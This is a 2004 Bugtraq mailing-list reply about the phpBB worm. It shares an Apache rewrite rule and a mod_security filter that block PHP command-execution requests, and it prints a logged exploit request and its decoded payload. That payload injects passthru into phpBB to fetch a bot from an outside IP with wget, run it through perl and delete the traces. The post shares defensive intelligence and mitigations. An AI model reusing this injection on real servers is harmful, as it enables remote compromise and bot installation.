Re: phpBB Worm

From: Sebastian Wiesinger (bofh_at_fire-world.de)
Date: 12/22/04

  • Next message: Alexander Klimov: "Re: phpBB Worm" 
    Date: Wed, 22 Dec 2004 12:22:15 +0100
To: bugtraq@securityfocus.com

    * Raymond Dijkxhoorn <raymond@prolocation.net> [2004-12-22 00:06]:
    > If you cannot fix it (virtual servers) fast for all your clients you could
    > also try with something like this:
    >
    > RewriteEngine On
    > RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
    > RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
    > RewriteRule ^.*$ - [F]
    >
    > We had some vhosts where this worked just fine. On our systems we didnt
    > see any valid request with echr and esystem, just be gentle with it, it
    > works for me, it could work for you ;)

    If you use mod_security, this may help, too:

    SecFilterSelective "THE_REQUEST" "(system|exec|passthru|popen|shell_exec|proc_open|fopen|fwrite)\s*\("

    I had another exploit attempt, with this payload:

    66.119.13.4 - - [22/Dec/2004:10:06:47 +0100] "GET /forum/viewtopic.php?t=%37&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%31%32%38%2E%31%37%34%2E%31%33%37%2E%32%33%30%2F%62%6E%20%2D%4F%20%2E%62%3B%20%70%65%72%6C%20%2D%70%65%20%79%2F%74%68%6D%76%64%77%30%39%38%37%36%35%34%33%32%31%75%6F%69%65%61%2F%61%65%69%6F%75%31%32%33%34%35%36%37%38%39%30%77%64%76%74%68%6D%2F%20%2E%62%7C%20%70%65%72%6C%3B%20%72%6D%20%2D%66%20%2E%62%20%2A%2E%70%6C%20%62%30%74%2A%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 12266 "-" "-"

    Which decodes to:

    rush=echo _START_; cd /tmp;wget 128.174.137.230/bn -O .b; perl -pe y/thmvdw0987654321uoiea/aeiou1234567890wdvthm/ .b| perl; rm -f .b *.pl b0t*; echo _END_
    highlight='.passthru($HTTP_GET_VARS[rush]).'

    Regards,

    Sebastian 

    -- 
GPG Key-ID: 0x76B79F20 (0x1B6034F476B79F20)
Wehret den Anfaengen: http://odem.org/informationsfreiheit/
Thunder rolled. ... It rolled a six.
  --Terry Pratchett, Guards! Guards!
  • Next message: Alexander Klimov: "Re: phpBB Worm"

    Relevant Pages

    • Re: phpBB Worm
      ... > access via phpbb in a series of crafted URL requests, ... If you cannot fix it (virtual servers) fast for all your clients you could ...
      (Bugtraq)
    • Re: now M$ quoting fix
      ... All other mail clients have perfect and color coded quotes? ... Coloring the seperate quotes by how many quote marks, ... Part fix part addon... ... Often used PDF reader included in IE, add-on in firefox. ...
      (alt.sports.basketball.nba.la-lakers)
    • Re: Multiple Userenv errors
      ... >> how to fix it. ... disabling the group policy object listed in the 1065 ... >> Along with this, I am not able to access WMI Control on any of my clients, ...
      (microsoft.public.windows.server.sbs)
    • Need for Speed Hot pursuit 2 <= 242 clients buffer overflow
      ... Bug ... Fix ... long string in the informations replied by the server. ... the clients automatically request informations to the ...
      (Bugtraq)
    • Re: now M$ quoting fix
      ... All other mail clients have perfect and color coded quotes? ... the world not to use innovations that delivered better quality video streams at high speeds because some browsers will not show it without an add-on. ... While quotefix making a mail file that opens and is perfectly useable prettier is a fix? ...
      (alt.sports.basketball.nba.la-lakers)